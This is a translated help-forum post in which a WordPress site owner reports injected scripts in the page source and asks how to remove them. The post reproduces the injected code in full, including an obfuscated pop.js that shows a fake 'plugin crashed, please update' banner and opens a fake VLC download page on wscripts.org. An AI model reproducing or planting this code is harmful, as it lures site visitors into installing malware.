我在 wordpress 网站上有这条消息:
无法连接到数据库服务器。找不到数据库 jimbob_je。应用程序出现意外问题。选择 statscurl_id 从
statscurl
哪里 statscurl_ip = '';
我已经使用sucuri.net进行了检查,但它没有找到任何东西,但仍然出现错误。我从浏览器中检查了页面源,并且在结束标头标记上方有 2 个加密脚本,但我在 header.php 中找不到它们。
这两个脚本在开头有“eval(unescape” ),当页面加载到状态栏中时,会出现 2 个站点: wscripts.org和jquery.com 此外,当使用Firebug检查加载的脚本时,有 2 个称为pop.js和imwb_cab_script。 js,但它们没有加密并且来自上面提到的站点。两者都是随机加载的。
这是imwb_cab_script.js的代码
jQuery(document).ready(function($) {
// $() will work as an alias for jQuery() inside of this function
imwb_activate_cab();
$('.imwb_cabar').live('click', function() {
var data = {
action :'imwb_cab_ctr_action',
barDetails: $(this).attr('id'),
nonce : IMWB_CAB_Ajax.nonce
};
$.ajax({
async: false,
type: 'POST',
url: IMWB_CAB_Ajax.ajaxurl,
data: data
});
imwb_goto_cab_link();
return true;
});
});
var cabCookie = function(name, value, expireHours, path) {
// name and at least value given, set cookie...
if (arguments.length > 1 ) {
if (expireHours === null || expireHours === undefined) {
expireHours = 7;
另一个代码脚本pop.js是:
var _0xf475=["\x69\x6D\x77\x62\x5F\x63\x61\x62\x31\x5F\x73\x68\x6F\x77","\x4E","\x69\x6D\x77\x62\x5F\x63\x61\x62\x31\x5F\x72\x65\x73\x68\x6F\x77","\x72\x61\x6E\x64\x6F\x6D","\x3C\x64\x69\x76\x20\x63\x6C\x61\x73\x73\x3D\x22\x69\x6D\x77\x62\x5F\x63\x61\x62\x61\x72\x22\x20\x69\x64\x3D\x22\x63\x61\x62\x5F\x31\x5F\x30\x22\x3E\x3C\x69\x6D\x67\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x69\x6D\x61\x67\x65\x73\x2F\x77\x61\x72\x6E\x69\x6E\x67\x2E\x67\x69\x66\x22\x3E\x3C\x70\x3E\x4F\x70\x70\x73\x21\x20\x59\x6F\x75\x72\x20\x58\x76\x69\x64\x20\x4D\x65\x64\x69\x61\x20\x50\x6C\x75\x67\x69\x6E\x20\x68\x61\x73\x20\x43\x72\x61\x73\x68\x65\x64\x21\x20\x3C\x73\x74\x72\x6F\x6E\x67\x3E\x3C\x73\x70\x61\x6E\x20\x73\x74\x79\x6C\x65\x3D\x22\x74\x65\x78\x74\x2D\x64\x65\x63\x6F\x72\x61\x74\x69\x6F\x6E\x3A\x20\x75\x6E\x64\x65\x72\x6C\x69\x6E\x65\x3B\x22\x3E\x3C\x73\x70\x61\x6E\x20\x73\x74\x79\x6C\x65\x3D\x22\x63\x6F\x6C\x6F\x72\x3A\x20\x23\x30\x30\x30\x30\x66\x66\x3B\x20\x74\x65\x78\x74\x2D\x64\x65\x63\x6F\x72\x61\x74\x69\x6F\x6E\x3A\x20\x75\x6E\x64\x65\x72\x6C\x69\x6E\x65\x3B\x22\x3E\x50\x6C\x65\x61\x73\x65\x20\x55\x70\x64\x61\x74\x65\x64\x20\x4E\x6F\x77\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x73\x70\x61\x6E\x3E\x3C\x2F\x73\x74\x72\x6F\x6E\x67\x3E\x3C\x2F\x70\x3E\x3C\x6F\x62\x6A\x65\x63\x74\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x69\x64\x3D\x22\x70\x6C\x61\x79\x65\x72\x22\x20\x63\x6C\x61\x73\x73\x69\x64\x3D\x22\x63\x6C\x73\x69\x64\x3A\x44\x32\x37\x43\x44\x42\x36\x45\x2D\x41\x45\x36\x44\x2D\x31\x31\x63\x66\x2D\x39\x36\x42\x38\x2D\x34\x34\x34\x35\x35\x33\x35\x34\x30\x30\x30\x30\x22\x3E\x3C\x70\x61\x72\x61\x6D\x20\x6E\x61\x6D\x65\x3D\x22\x6D\x6F\x76\x69\x65\x22\x20\x76\x61\x6C\x75\x65\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x4A\x46\x50\x6C\x61\x79\x49\x74\x2E\x73\x77\x66\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x63\x61\x62\x61\x72\x2E\x6D\x70\x33\x22\x3E\x3C\x65\x6D\x62\x65\x64\x20\x73\x72\x63\x3D\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x4A\x46\x50\x6C\x61\x79\x49\x74\x2E\x73\x77\x66\x3F\x75\x72\x6C\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x31\x32\x33\x34\x35\x2F\x77\x70\x2D\x63\x6F\x6E\x74\x65\x6E\x74\x2F\x70\x6C\x75\x67\x69\x6E\x73\x2F\x63\x6F\x76\x65\x72\x74\x61\x63\x74\x69\x6F\x6E\x62\x61\x72\x2D\x70\x72\x6F\x2F\x63\x61\x62\x61\x72\x2E\x6D\x70\x33\x22\x20\x6E\x61\x6D\x65\x3D\x22\x70\x6C\x61\x79\x65\x72\x22\x20\x77\x69\x64\x74\x68\x3D\x22\x30\x22\x20\x68\x65\x69\x67\x68\x74\x3D\x22\x30\x22\x20\x74\x79\x70\x65\x3D\x22\x61\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x2F\x78\x2D\x73\x68\x6F\x63\x6B\x77\x61\x76\x65\x2D\x66\x6C\x61\x73\x68\x22\x3E\x3C\x2F\x65\x6D\x62\x65\x64\x3E\x3C\x2F\x6F\x62\x6A\x65\x63\x74\x3E\x3C\x2F\x64\x69\x76\x3E","\x70\x72\x65\x70\x65\x6E\x64","\x62\x6F\x64\x79","\x2F\x31\x32\x33\x34\x35\x2F","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x77\x73\x63\x72\x69\x70\x74\x73\x2E\x6F\x72\x67\x2F\x64\x6F\x77\x6E\x6C\x6F\x61\x64\x2D\x76\x6C\x63\x2D\x70\x6C\x61\x79\x65\x72\x2F\x3F\x6D\x6E\x3D\x34\x34\x36\x33\x34\x33\x34\x32\x32\x32\x36","\x5F\x73\x65\x6C\x66","\x6F\x70\x65\x6E"];function imwb_activate_cab(){if(cabCookie(_0xf475[0])==_0xf475[1]||cabCookie(_0xf475[2])==_0xf475[1]){return ;} ;setTimeout(imwb_show_cab,2000);} ;function imwb_show_cab(){if(Math[_0xf475[3]]()<0.02){jQuery(_0xf475[6])[_0xf475[5]](_0xf475[4]);cabCookie(_0xf475[2],_0xf475[1],0,_0xf475[7]);} ;} ;function imwb_goto_cab_link(){cabCookie(_0xf475[0],_0xf475[1],0,_0xf475[7]);window[_0xf475[10]](_0xf475[8],_0xf475[9]);} ;
问题是如何删除出现在浏览器页面源中的这些代码。
你可以在这里看到加密的脚本
关于如何摆脱这些代码的任何其他解决方案?
谢谢!!!
PD:该网站没有使用任何插件